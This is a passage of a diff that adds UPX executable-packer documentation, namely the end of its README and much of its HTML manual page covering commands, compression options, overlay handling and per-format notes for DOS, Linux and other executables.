+    Unfortunately we know next to nothing about the operating system
+    architecture of such handhelds, so we need some information from
+    an expert. Please contact us if you think you can help.
+
+  - The Linux approach could probably get ported to a lot of other Unix
+    variants, at least for other i386 architectures it shouldn't be too
+    much work. If someone sends me a fresh hard disk and an official
+    FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-)
+
+  - We will *NOT* add any sort of protection and/or encryption.
+    This only gives people a false feeling of security because
+    by definition all protectors/compressors can be broken.
+    And don't trust any advertisement of authors of other executable
+    compressors about this topic - just do a websearch on "unpackers"...
+
+  - Fix all remaining bugs - keep your reports coming ;-)
+
+  - See the file PROJECTS in the source code distribution if you want
+    to contribute.
+
+
+COPYRIGHT
+=========
+
+Copyright (C) 1996-2008 Markus Franz Xaver Johannes Oberhumer
+Copyright (C) 1996-2008 Laszlo Molnar
+Copyright (C) 2000-2008 John F. Reiser
+
+This program may be used freely, and you are welcome to
+redistribute it under certain conditions.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+UPX License Agreement for more details.
+
+You should have received a copy of the UPX License Agreement along
+with this program; see the file LICENSE. If not, visit the UPX home page.
+
+
+Share and enjoy,
+Markus & Laszlo
+
+
+   Markus F.X.J. Oberhumer              Laszlo Molnar
+   <markus@oberhumer.com>               <ml1050@users.sourceforge.net>
+
+
+
+[ The term UPX is a shorthand for the Ultimate Packer for eXecutables
+  and holds no connection with potential owners of registered trademarks
+  or other rights. ]
+
+[ Feel free to contact us if you have commercial compression requirements
+  or interesting job offers. ]
+
--- a/lib/contrib/upx/doc/upx.html
+++ b/lib/contrib/upx/doc/upx.html
@@ -0,0 +1,888 @@
+<?xml version="1.0" ?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<title>upx - compress or expand executable files</title>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<link rev="made" href="mailto:root@localhost" />
+</head>
+
+<body style="background-color: white">
+
+<p><a name="__index__"></a></p>
+<!-- INDEX BEGIN -->
+<!--
+
+<ul>
+
+  <li><a href="#name">NAME</a></li>
+  <li><a href="#synopsis">SYNOPSIS</a></li>
+  <li><a href="#abstract">ABSTRACT</a></li>
+  <li><a href="#disclaimer">DISCLAIMER</a></li>
+  <li><a href="#description">DESCRIPTION</a></li>
+  <li><a href="#commands">COMMANDS</a></li>
+  <ul>
+
+    <li><a href="#compress">Compress</a></li>
+    <li><a href="#decompress">Decompress</a></li>
+    <li><a href="#test">Test</a></li>
+    <li><a href="#list">List</a></li>
+  </ul>
+
+  <li><a href="#options">OPTIONS</a></li>
+  <li><a href="#compression_levels___tuning">COMPRESSION LEVELS &amp; TUNING</a></li>
+  <li><a href="#overlay_handling_options">OVERLAY HANDLING OPTIONS</a></li>
+  <li><a href="#environment">ENVIRONMENT</a></li>
+  <li><a href="#notes_for_the_supported_executable_formats">NOTES FOR THE SUPPORTED EXECUTABLE FORMATS</a></li>
+  <ul>
+
+    <li><a href="#notes_for_atari_tos">NOTES FOR ATARI/TOS</a></li>
+    <li><a href="#notes_for_bvmlinuz_i386">NOTES FOR BVMLINUZ/I386</a></li>
+    <li><a href="#notes_for_dos_com">NOTES FOR DOS/COM</a></li>
+    <li><a href="#notes_for_dos_exe">NOTES FOR DOS/EXE</a></li>
+    <li><a href="#notes_for_dos_sys">NOTES FOR DOS/SYS</a></li>
+    <li><a href="#notes_for_djgpp2_coff">NOTES FOR DJGPP2/COFF</a></li>
+    <li><a href="#notes_for_linux__general_">NOTES FOR LINUX [general]</a></li>
+    <li><a href="#notes_for_linux_elf386">NOTES FOR LINUX/ELF386</a></li>
+    <li><a href="#notes_for_linux_sh386">NOTES FOR LINUX/SH386</a></li>
+    <li><a href="#notes_for_linux_386">NOTES FOR LINUX/386</a></li>
+    <li><a href="#notes_for_ps1_exe">NOTES FOR PS1/EXE</a></li>
+    <li><a href="#notes_for_rtm32_pe_and_arm_pe">NOTES FOR RTM32/PE and ARM/PE</a></li>
+    <li><a href="#notes_for_tmt_adam">NOTES FOR TMT/ADAM</a></li>
+    <li><a href="#notes_for_vmlinuz_386">NOTES FOR VMLINUZ/386</a></li>
+    <li><a href="#notes_for_watcom_le">NOTES FOR WATCOM/LE</a></li>
+    <li><a href="#notes_for_win32_pe">NOTES FOR WIN32/PE</a></li>
+  </ul>
+
+  <li><a href="#diagnostics">DIAGNOSTICS</a></li>
+  <li><a href="#bugs">BUGS</a></li>
+  <li><a href="#authors">AUTHORS</a></li>
+  <li><a href="#copyright">COPYRIGHT</a></li>
+</ul>
+-->
+<!-- INDEX END -->
+
+<p>
+</p>
+<h1><a name="name">NAME</a></h1>
+<p>upx - compress or expand executable files</p>
+<p>
+</p>
+<hr />
+<h1><a name="synopsis">SYNOPSIS</a></h1>
+<p><strong>upx</strong> [&nbsp;<em>command</em>&nbsp;] [&nbsp;<em>options</em>&nbsp;] <em>filename</em>...</p>
+<p>
+</p>
+<hr />
+<h1><a name="abstract">ABSTRACT</a></h1>
+<pre>
+                    The Ultimate Packer for eXecutables
+   Copyright (c) 1996-2008 Markus Oberhumer, Laszlo Molnar &amp; John Reiser
+                        <a href="http://upx.sourceforge.net">http://upx.sourceforge.net</a></pre>
+<p><strong>UPX</strong> is a portable, extendable, high-performance executable packer for
+several different executable formats. It achieves an excellent compression
+ratio and offers <em>*very*</em> fast decompression. Your executables suffer
+no memory overhead or other drawbacks for most of the formats supported,
+because of in-place decompression.</p>
+<p>While you may use <strong>UPX</strong> freely for both non-commercial and commercial
+executables (for details see the file LICENSE), we would highly
+appreciate if you credit <strong>UPX</strong> and ourselves in the documentation,
+possibly including a reference to the <strong>UPX</strong> home page. Thanks.</p>
+<p>[ Using <strong>UPX</strong> in non-OpenSource applications without proper credits
+is considered not politically correct ;-) ]</p>
+<p>
+</p>
+<hr />
+<h1><a name="disclaimer">DISCLAIMER</a></h1>
+<p><strong>UPX</strong> comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.</p>
+<p>This is the first production quality release, and we plan that future 1.xx
+releases will be backward compatible with this version.</p>
+<p>Please report all problems or suggestions to the authors. Thanks.</p>
+<p>
+</p>
+<hr />
+<h1><a name="description">DESCRIPTION</a></h1>
+<p><strong>UPX</strong> is a versatile executable packer with the following features:</p>
+<pre>
+  - excellent compression ratio: compresses better than zip/gzip,
+      use UPX to decrease the size of your distribution !</pre>
+<pre>
+  - very fast decompression: about 10 MiB/sec on an ancient Pentium 133,
+      about 200 MiB/sec on an Athlon XP 2000+.</pre>
+<pre>
+  - no memory overhead for your compressed executables for most of the
+      supported formats</pre>
+<pre>
+  - safe: you can list, test and unpack your executables
+      Also, a checksum of both the compressed and uncompressed file is
+      maintained internally.</pre>
+<pre>
+  - universal: UPX can pack a number of executable formats:
+      * atari/tos
+      * bvmlinuz/386    [bootable Linux kernel]
+      * djgpp2/coff
+      * dos/com
+      * dos/exe
+      * dos/sys
+      * linux/386
+      * linux/elf386
+      * linux/sh386
+      * ps1/exe
+      * rtm32/pe
+      * tmt/adam
+      * vmlinuz/386     [bootable Linux kernel]
+      * vmlinux/386
+      * watcom/le (supporting DOS4G, PMODE/W, DOS32a and CauseWay)
+      * win32/pe (exe and dll)
+      * arm/pe (exe and dll)
+      * linux/elfamd64
+      * linux/elfppc32
+      * mach/elfppc32</pre>
+<pre>
+  - portable: UPX is written in portable endian-neutral C++</pre>
+<pre>
+  - extendable: because of the class layout it's very easy to support
+      new executable formats or add new compression algorithms</pre>
+<pre>
+  - free: UPX can be distributed and used freely. And from version 0.99
+      the full source code of UPX is released under the GNU General Public
+      License (GPL) !</pre>
+<p>You probably understand now why we call <strong>UPX</strong> the ``<em>ultimate</em>''
+executable packer.</p>
+<p>
+</p>
+<hr />
+<h1><a name="commands">COMMANDS</a></h1>
+<p>
+</p>
+<h2><a name="compress">Compress</a></h2>
+<p>This is the default operation, eg. <strong>upx yourfile.exe</strong> will compress the file
+specified on the command line.</p>
+<p>
+</p>
+<h2><a name="decompress">Decompress</a></h2>
+<p>All <strong>UPX</strong> supported file formats can be unpacked using the <strong>-d</strong> switch, eg.
+<strong>upx -d yourfile.exe</strong> will uncompress the file you've just compressed.</p>
+<p>
+</p>
+<h2><a name="test">Test</a></h2>
+<p>The <strong>-t</strong> command tests the integrity of the compressed and uncompressed
+data, eg. <strong>upx -t yourfile.exe</strong> check whether your file can be safely
+decompressed. Note, that this command doesn't check the whole file, only
+the part that will be uncompressed during program execution. This means
+that you should not use this command instead of a virus checker.</p>
+<p>
+</p>
+<h2><a name="list">List</a></h2>
+<p>The <strong>-l</strong> command prints out some information about the compressed files
+specified on the command line as parameters, eg <strong>upx -l yourfile.exe</strong>
+shows the compressed / uncompressed size and the compression ratio of
+<em>yourfile.exe</em>.</p>
+<p>
+</p>
+<hr />
+<h1><a name="options">OPTIONS</a></h1>
+<p><strong>-q</strong>: be quiet, suppress warnings</p>
+<p><strong>-q -q</strong> (or <strong>-qq</strong>): be very quiet, suppress errors</p>
+<p><strong>-q -q -q</strong> (or <strong>-qqq</strong>): produce no output at all</p>
+<p><strong>--help</strong>: prints the help</p>
+<p><strong>--version</strong>: print the version of <strong>UPX</strong></p>
+<p><strong>--exact</strong>: when compressing, require to be able to get a byte-identical file
+after decompression with option <strong>-d</strong>. [NOTE: this is work in progress and is
+not supported for all formats yet. If you do care, as a workaround you can
+compress and then decompress your program a first time - any further
+compress-decompress steps should then yield byte-identical results
+as compared to the first decompressed version.]</p>
+<p>[ ...to be written... - type `<strong>upx --help</strong>' for now ]</p>
+<p>
+</p>
+<hr />
+<h1><a name="compression_levels___tuning">COMPRESSION LEVELS &amp; TUNING</a></h1>
+<p><strong>UPX</strong> offers ten different compression levels from <strong>-1</strong> to <strong>-9</strong>,
+and <strong>--best</strong>.  The default compression level is <strong>-8</strong> for files
+smaller than 512 KiB, and <strong>-7</strong> otherwise.</p>
+<ul>
+<li>
+<p>Compression levels 1, 2 and 3 are pretty fast.</p>
+</li>
+<li>
+<p>Compression levels 4, 5 and 6 achieve a good time/ratio performance.</p>
+</li>
+<li>
+<p>Compression levels 7, 8 and 9 favor compression ratio over speed.</p>
+</li>
+<li>
+<p>Compression level <strong>--best</strong> may take a long time.</p>
+</li>
+</ul>
+<p>Note that compression level <strong>--best</strong> can be somewhat slow for large
+files, but you definitely should use it when releasing a final version
+of your program.</p>
+<p>Quick info for achieving the best compression ratio:</p>
+<ul>
+<li>
+<p>Try <strong>upx --brute myfile.exe</strong> or even <strong>upx --ultra-brute myfile.exe</strong>.</p>
+</li>
+<li>
+<p>Try if <strong>--overlay=strip</strong> works.</p>
+</li>
+<li>
+<p>For win32/pe programs there's <strong>--strip-relocs=0</strong>. See notes below.</p>
+</li>
+</ul>
+<p>
+</p>
+<hr />
+<h1><a name="overlay_handling_options">OVERLAY HANDLING OPTIONS</a></h1>
+<p>Info: An ``overlay'' means auxiliary data attached after the logical end of
+an executable, and it often contains application specific data
+(this is a common practice to avoid an extra data file, though
+it would be better to use resource sections).</p>
+<p><strong>UPX</strong> handles overlays like many other executable packers do: it simply
+copies the overlay after the compressed image. This works with some
+files, but doesn't work with others, depending on how an application
+actually accesses this overlayed data.</p>
+<pre>
+  --overlay=copy    Copy any extra data attached to the file. [DEFAULT]</pre>
+<pre>
+  --overlay=strip   Strip any overlay from the program instead of
+                    copying it. Be warned, this may make the compressed
+                    program crash or otherwise unusable.</pre>
+<pre>
+  --overlay=skip    Refuse to compress any program which has an overlay.</pre>
+<p>
+</p>
+<hr />
+<h1><a name="environment">ENVIRONMENT</a></h1>
+<p>The environment variable <strong>UPX</strong> can hold a set of default
+options for <strong>UPX</strong>. These options are interpreted first and
+can be overwritten by explicit command line parameters.
+For example:</p>
+<pre>
+    for DOS/Windows:   set UPX=-9 --compress-icons#0
+    for sh/ksh/zsh:    UPX=&quot;-9 --compress-icons=0&quot;; export UPX
+    for csh/tcsh:      setenv UPX &quot;-9 --compress-icons=0&quot;</pre>
+<p>Under DOS/Windows you must use '#' instead of '=' when setting the
+environment variable because of a COMMAND.COM limitation.</p>
+<p>Not all of the options are valid in the environment variable -
+<strong>UPX</strong> will tell you.</p>
+<p>You can explicitly use the <strong>--no-env</strong> option to ignore the
+environment variable.</p>
+<p>
+</p>
+<hr />
+<h1><a name="notes_for_the_supported_executable_formats">NOTES FOR THE SUPPORTED EXECUTABLE FORMATS</a></h1>
+<p>
+</p>
+<h2><a name="notes_for_atari_tos">NOTES FOR ATARI/TOS</a></h2>
+<p>This is the executable format used by the Atari ST/TT, a Motorola 68000
+based personal computer which was popular in the late '80s. Support
+of this format is only because of nostalgic feelings of one of
+the authors and serves no practical purpose :-).
+See <a href="http://www.freemint.de">http://www.freemint.de</a> for more info.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.
+All debug information will be stripped, though.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_bvmlinuz_i386">NOTES FOR BVMLINUZ/I386</a></h2>
+<p>Same as vmlinuz/i386.</p>
+<p>
+</p>
+<h2><a name="notes_for_dos_com">NOTES FOR DOS/COM</a></h2>
+<p>Obviously <strong>UPX</strong> won't work with executables that want to read data from
+themselves (like some commandline utilities that ship with Win95/98/ME).</p>
+<p>Compressed programs only work on a 286+.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.</p>
+<p>Maximum uncompressed size: ~65100 bytes.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --8086              Create an executable that works on any 8086 CPU.</pre>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --all-filters       Compress the program several times, using all
+                      available preprocessing filters. This may improve
+                      the compression ratio in some cases, but usually
+                      the default filter gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_dos_exe">NOTES FOR DOS/EXE</a></h2>
+<p>dos/exe stands for all ``normal'' 16-bit DOS executables.</p>
+<p>Obviously <strong>UPX</strong> won't work with executables that want to read data from
+themselves (like some command line utilities that ship with Win95/98/ME).</p>
+<p>Compressed programs only work on a 286+.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --8086              Create an executable that works on any 8086 CPU.</pre>
+<pre>
+  --no-reloc          Use no relocation records in the exe header.</pre>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_dos_sys">NOTES FOR DOS/SYS</a></h2>
+<p>Compressed programs only work on a 286+.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.</p>
+<p>Maximum uncompressed size: ~65350 bytes.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --8086              Create an executable that works on any 8086 CPU.</pre>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --all-filters       Compress the program several times, using all
+                      available preprocessing filters. This may improve
+                      the compression ratio in some cases, but usually
+                      the default filter gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_djgpp2_coff">NOTES FOR DJGPP2/COFF</a></h2>
+<p>First of all, it is recommended to use <strong>UPX</strong> *instead* of <strong>strip</strong>. strip has
+the very bad habit of replacing your stub with its own (outdated) version.
+Additionally <strong>UPX</strong> corrects a bug/feature in strip v2.8.x: it
+will fix the 4 KiB alignment of the stub.</p>
+<p><strong>UPX</strong> includes the full functionality of stubify. This means it will
+automatically stubify your COFF files. Use the option <strong>--coff</strong> to
+disable this functionality (see below).</p>
+<p><strong>UPX</strong> automatically handles Allegro packfiles.</p>
+<p>The DLM format (a rather exotic shared library extension) is not supported.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.
+All debug information and trailing garbage will be stripped, though.</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --coff              Produce COFF output instead of EXE. By default
+                      UPX keeps your current stub.</pre>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --all-filters       Compress the program several times, using all
+                      available preprocessing filters. This may improve
+                      the compression ratio in some cases, but usually
+                      the default filter gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_linux__general_">NOTES FOR LINUX [general]</a></h2>
+<p>Introduction</p>
+<pre>
+  Linux/386 support in UPX consists of 3 different executable formats,
+  one optimized for ELF executables (&quot;linux/elf386&quot;), one optimized
+  for shell scripts (&quot;linux/sh386&quot;), and one generic format
+  (&quot;linux/386&quot;).</pre>
+<pre>
+  We will start with a general discussion first, but please
+  also read the relevant docs for each of the individual formats.</pre>
+<pre>
+  Also, there is special support for bootable kernels - see the
+  description of the vmlinuz/386 format.</pre>
+<p>General user's overview</p>
+<pre>
+  Running a compressed executable program trades less space on a
+  ``permanent'' storage medium (such as a hard disk, floppy disk,
+  CD-ROM, flash memory, EPROM, etc.) for more space in one or more
+  ``temporary'' storage media (such as RAM, swap space, /tmp, etc.).
+  Running a compressed executable also requires some additional CPU
+  cycles to generate the compressed executable in the first place,
+  and to decompress it at each invocation.</pre>
+<pre>
+  How much space is traded?  It depends on the executable, but many
+  programs save 30% to 50% of permanent disk space.  How much CPU
+  overhead is there?  Again, it depends on the executable, but
+  decompression speed generally is at least many megabytes per second,
+  and frequently is limited by the speed of the underlying disk
+  or network I/O.</pre>
+<pre>
+  Depending on the statistics of usage and access, and the relative
+  speeds of CPU, RAM, swap space, /tmp, and file system storage, then
+  invoking and running a compressed executable can be faster than
+  directly running the corresponding uncompressed program.
+  The operating system might perform fewer expensive I/O operations
+  to invoke the compressed program.  Paging to or from swap space
+  or /tmp might be faster than paging from the general file system.
+  ``Medium-sized'' programs which access about 1/3 to 1/2 of their
+  stored program bytes can do particularly well with compression.
+  Small programs tend not to benefit as much because the absolute
+  savings is less.  Big programs tend not to benefit proportionally
+  because each invocation may use only a small fraction of the program,
+  yet UPX decompresses the entire program before invoking it.
+  But in environments where disk or flash memory storage is limited,
+  then compression may win anyway.</pre>
+<pre>
+  Currently, executables compressed by UPX do not share RAM at runtime
+  in the way that executables mapped from a file system do.  As a
+  result, if the same program is run simultaneously by more than one
+  process, then using the compressed version will require more RAM and/or
+  swap space.  So, shell programs (bash, csh, etc.)  and ``make''
+  might not be good candidates for compression.</pre>
+<pre>
+  UPX recognizes three executable formats for Linux: Linux/elf386,
+  Linux/sh386, and Linux/386.  Linux/386 is the most generic format;
+  it accommodates any file that can be executed.  At runtime, the UPX
+  decompression stub re-creates in /tmp a copy of the original file,
+  and then the copy is (re-)executed with the same arguments.
+  ELF binary executables prefer the Linux/elf386 format by default,
+  because UPX decompresses them directly into RAM, uses only one
+  exec, does not use space in /tmp, and does not use /proc.
+  Shell scripts where the underlying shell accepts a ``-c'' argument
+  can use the Linux/sh386 format.  UPX decompresses the shell script
+  into low memory, then maps the shell and passes the entire text of the
+  script as an argument with a leading ``-c''.</pre>
+<p>General benefits:</p>
+<pre>
+  - UPX can compress all executables, be it AOUT, ELF, libc4, libc5,
+    libc6, Shell/Perl/Python/... scripts, standalone Java .class
+    binaries, or whatever...
+    All scripts and programs will work just as before.</pre>
+<pre>
+  - Compressed programs are completely self-contained. No need for
+    any external program.</pre>
+<pre>
+  - UPX keeps your original program untouched. This means that
+    after decompression you will have a byte-identical version,
+    and you can use UPX as a file compressor just like gzip.
+    [ Note that UPX maintains a checksum of the file internally,
+      so it is indeed a reliable alternative. ]</pre>
+<pre>
+  - As the stub only uses syscalls and isn't linked against libc it
+    should run under any Linux configuration that can run ELF
+    binaries.</pre>
+<pre>
+  - For the same reason compressed executables should run under
+    FreeBSD and other systems which can run Linux binaries.
+    [ Please send feedback on this topic ]</pre>
+<p>General drawbacks:</p>
+<pre>
+  - It is not advisable to compress programs which usually have many
+    instances running (like `sh' or `make') because the common segments of
+    compressed programs won't be shared any longer between different
+    processes.</pre>
+<pre>
+  - `ldd' and `size' won't show anything useful because all they
+    see is the statically linked stub.  Since version 0.82 the section
+    headers are stripped from the UPX stub and `size' doesn't even
+    recognize the file format.  The file patches/patch-elfcode.h has a
+    patch to fix this bug in `size' and other programs which use GNU BFD.</pre>
+<p>General notes:</p>
+<pre>
+  - As UPX leaves your original program untouched it is advantageous
+    to strip it before compression.</pre>
+<pre>
+  - If you compress a script you will lose platform independence -
+    this could be a problem if you are using NFS mounted disks.</pre>
+<pre>
+  - Compression of suid, guid and sticky-bit programs is rejected
+    because of possible security implications.</pre>
+<pre>
+  - For the same reason there is no sense in making any compressed
+    program suid.</pre>
+<pre>
+  - Obviously UPX won't work with executables that want to read data
+    from themselves. E.g., this might be a problem for Perl scripts
+    which access their __DATA__ lines.</pre>
+<pre>
+  - In case of internal errors the stub will abort with exitcode 127.
+    Typical reasons for this to happen are that the program has somehow
+    been modified after compression.
+    Running `strace -o strace.log compressed_file' will tell you more.</pre>
+<p>
+</p>
+<h2><a name="notes_for_linux_elf386">NOTES FOR LINUX/ELF386</a></h2>
+<p>Please read the general Linux description first.</p>
+<p>The linux/elf386 format decompresses directly into RAM,
+uses only one exec, does not use space in /tmp,
+and does not use /proc.</p>
+<p>Linux/elf386 is automatically selected for Linux ELF executables.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.</p>
+<p>How it works:</p>
+<pre>
+  For ELF executables, UPX decompresses directly to memory, simulating
+  the mapping that the operating system kernel uses during exec(),
+  including the PT_INTERP program interpreter (if any).
+  The brk() is set by a special PT_LOAD segment in the compressed
+  executable itself.  UPX then wipes the stack clean except for
+  arguments, environment variables, and Elf_auxv entries (this is
+  required by bugs in the startup code of /lib/ld-linux.so as of
+  May 2000), and transfers control to the program interpreter or
+  the e_entry address of the original executable.</pre>
+<pre>
+  The UPX stub is about 1700 bytes long, partly written in assembler
+  and only uses kernel syscalls. It is not linked against any libc.</pre>
+<p>Specific drawbacks:</p>
+<pre>
+  - For linux/elf386 and linux/sh386 formats, you will be relying on
+    RAM and swap space to hold all of the decompressed program during
+    the lifetime of the process.  If you already use most of your swap
+    space, then you may run out.  A system that is &quot;out of memory&quot;
+    can become fragile.  Many programs do not react gracefully when
+    malloc() returns 0.  With newer Linux kernels, the kernel
+    may decide to kill some processes to regain memory, and you
+    may not like the kernel's choice of which to kill.  Running
+    /usr/bin/top is one way to check on the usage of swap space.</pre>
+<p>Extra options available for this executable format:</p>
+<pre>
+  (none)</pre>
+<p>
+</p>
+<h2><a name="notes_for_linux_sh386">NOTES FOR LINUX/SH386</a></h2>
+<p>Please read the general Linux description first.</p>
+<p>Shell scripts where the underling shell accepts a ``-c'' argument
+can use the Linux/sh386 format.  <strong>UPX</strong> decompresses the shell script
+into low memory, then maps the shell and passes the entire text of the
+script as an argument with a leading ``-c''.
+It does not use space in /tmp, and does not use /proc.</p>
+<p>Linux/sh386 is automatically selected for shell scripts that
+use a known shell.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.</p>
+<p>How it works:</p>
+<pre>
+  For shell script executables (files beginning with &quot;#!/&quot; or &quot;#! /&quot;)
+  where the shell is known to accept &quot;-c &lt;command&gt;&quot;, UPX decompresses
+  the file into low memory, then maps the shell (and its PT_INTERP),
+  and passes control to the shell with the entire decompressed file
+  as the argument after &quot;-c&quot;.  Known shells are sh, ash, bash, bsh, csh,
+  ksh, tcsh, pdksh.  Restriction: UPX cannot use this method
+  for shell scripts which use the one optional string argument after
+  the shell name in the script (example: &quot;#! /bin/sh option3\n&quot;.)</pre>
+<pre>
+  The UPX stub is about 1700 bytes long, partly written in assembler
+  and only uses kernel syscalls. It is not linked against any libc.</pre>
+<p>Specific drawbacks:</p>
+<pre>
+  - For linux/elf386 and linux/sh386 formats, you will be relying on
+    RAM and swap space to hold all of the decompressed program during
+    the lifetime of the process.  If you already use most of your swap
+    space, then you may run out.  A system that is &quot;out of memory&quot;
+    can become fragile.  Many programs do not react gracefully when
+    malloc() returns 0.  With newer Linux kernels, the kernel
+    may decide to kill some processes to regain memory, and you
+    may not like the kernel's choice of which to kill.  Running
+    /usr/bin/top is one way to check on the usage of swap space.</pre>
+<p>Extra options available for this executable format:</p>
+<pre>
+  (none)</pre>
+<p>
+</p>
+<h2><a name="notes_for_linux_386">NOTES FOR LINUX/386</a></h2>
+<p>Please read the general Linux description first.</p>
+<p>The generic linux/386 format decompresses to /tmp and needs
+/proc file system support. It starts the decompressed program
+via the <code>execve()</code> syscall.</p>
+<p>Linux/386 is only selected if the specialized linux/elf386
+and linux/sh386 won't recognize a file.</p>
+<p>Packed programs will be byte-identical to the original after uncompression.</p>
+<p>How it works:</p>
+<pre>
+  For files which are not ELF and not a script for a known &quot;-c&quot; shell,
+  UPX uses kernel execve(), which first requires decompressing to a
+  temporary file in the file system.  Interestingly -
+  because of the good memory management of the Linux kernel - this
+  often does not introduce a noticeable delay, and in fact there
+  will be no disk access at all if you have enough free memory as
+  the entire process takes places within the file system buffers.</pre>
+<pre>
+  A compressed executable consists of the UPX stub and an overlay
+  which contains the original program in a compressed form.</pre>
+<pre>
+  The UPX stub is a statically linked ELF executable and does
+  the following at program startup:</pre>
+<pre>
+    1) decompress the overlay to a temporary location in /tmp
+    2) open the temporary file for reading
+    3) try to delete the temporary file and start (execve)
+       the uncompressed program in /tmp using /proc/&lt;pid&gt;/fd/X as
+       attained by step 2)
+    4) if that fails, fork off a subprocess to clean up and
+       start the program in /tmp in the meantime</pre>
+<pre>
+  The UPX stub is about 1700 bytes long, partly written in assembler
+  and only uses kernel syscalls. It is not linked against any libc.</pre>
+<p>Specific drawbacks:</p>
+<pre>
+  - You need additional free disk space for the uncompressed program
+    in your /tmp directory. This program is deleted immediately after
+    decompression, but you still need it for the full execution time
+    of the program.</pre>
+<pre>
+  - You must have /proc file system support as the stub wants to open
+    /proc/&lt;pid&gt;/exe and needs /proc/&lt;pid&gt;/fd/X. This also means that you
+    cannot compress programs that are used during the boot sequence
+    before /proc is mounted.</pre>
+<pre>
+  - Utilities like `top' will display numerical values in the process
+    name field. This is because Linux computes the process name from
+    the first argument of the last execve syscall (which is typically
+    something like /proc/&lt;pid&gt;/fd/3).</pre>
+<pre>
+  - Because of temporary decompression to disk the decompression speed
+    is not as fast as with the other executable formats. Still, I can see
+    no noticeable delay when starting programs like my ~3 MiB emacs (which
+    is less than 1 MiB when compressed :-).</pre>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --force-execve      Force the use of the generic linux/386 &quot;execve&quot;
+                      format, i.e. do not try the linux/elf386 and
+                      linux/sh386 formats.</pre>
+<p>
+</p>
+<h2><a name="notes_for_ps1_exe">NOTES FOR PS1/EXE</a></h2>
+<p>This is the executable format used by the Sony PlayStation (PSone),
+a Mips R3000 based gaming console which is popular since the late '90s.
+Support of this format is very similar to the Atari one, because of
+nostalgic feelings of one of the authors.</p>
+<p>Packed programs will be byte-identical to the original after uncompression,
+until further notice.</p>
+<p>Maximum uncompressed size: ~1.89 / ~7.60 MiB.</p>
+<p>Notes:</p>
+<pre>
+  - UPX creates as default a suitable executable for CD-Mastering
+    and console transfer. For a CD-Master main executable you could also try
+    the special option &quot;--boot-only&quot; as described below.
+    It has been reported that upx packed executables are fully compatible with
+    the Sony PlayStation 2 (PS2, PStwo) and Sony PlayStation Portable (PSP) in
+    Sony PlayStation (PSone) emulation mode.</pre>
+<pre>
+  - Normally the packed files use the same memory areas like the uncompressed
+    versions, so they will not override other memory areas while unpacking.
+    If this isn't possible UPX will abort showing a 'packed data overlap'
+    error. With the &quot;--force&quot; option UPX will relocate the loading address
+    for the packed file, but this isn't a real problem if it is a single or
+    the main executable.</pre>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --8-bit             Uses 8 bit size compression [default: 32 bit]</pre>
+<pre>
+  --8mib-ram          PSone has 8 MiB ram available [default: 2 MiB]</pre>
+<pre>
+  --boot-only         This format is for main exes and CD-Mastering only !
+                      It may slightly improve the compression ratio,
+                      decompression routines are faster than default ones.
+                      But it cannot be used for console transfer !</pre>
+<pre>
+  --no-align          This option disables CD mode 2 data sector format
+                      alignment. May slightly improves the compression ratio,
+                      but the compressed executable will not boot from a CD.
+                      Use it for console transfer only !</pre>
+<p>
+</p>
+<h2><a name="notes_for_rtm32_pe_and_arm_pe">NOTES FOR RTM32/PE and ARM/PE</a></h2>
+<p>Same as win32/pe.</p>
+<p>
+</p>
+<h2><a name="notes_for_tmt_adam">NOTES FOR TMT/ADAM</a></h2>
+<p>This format is used by the TMT Pascal compiler - see <a href="http://www.tmt.com/">http://www.tmt.com/</a> .</p>
+<p>Extra options available for this executable format:</p>
+<pre>
+  --all-methods       Compress the program several times, using all
+                      available compression methods. This may improve
+                      the compression ratio in some cases, but usually
+                      the default method gives the best results anyway.</pre>
+<pre>
+  --all-filters       Compress the program several times, using all
+                      available preprocessing filters. This may improve
+                      the compression ratio in some cases, but usually
+                      the default filter gives the best results anyway.</pre>
+<p>
+</p>
+<h2><a name="notes_for_vmlinuz_386">NOTES FOR VMLINUZ/386</a></h2>
+<p>The vmlinuz/386 and bvmlinuz/386 formats take a gzip-compressed
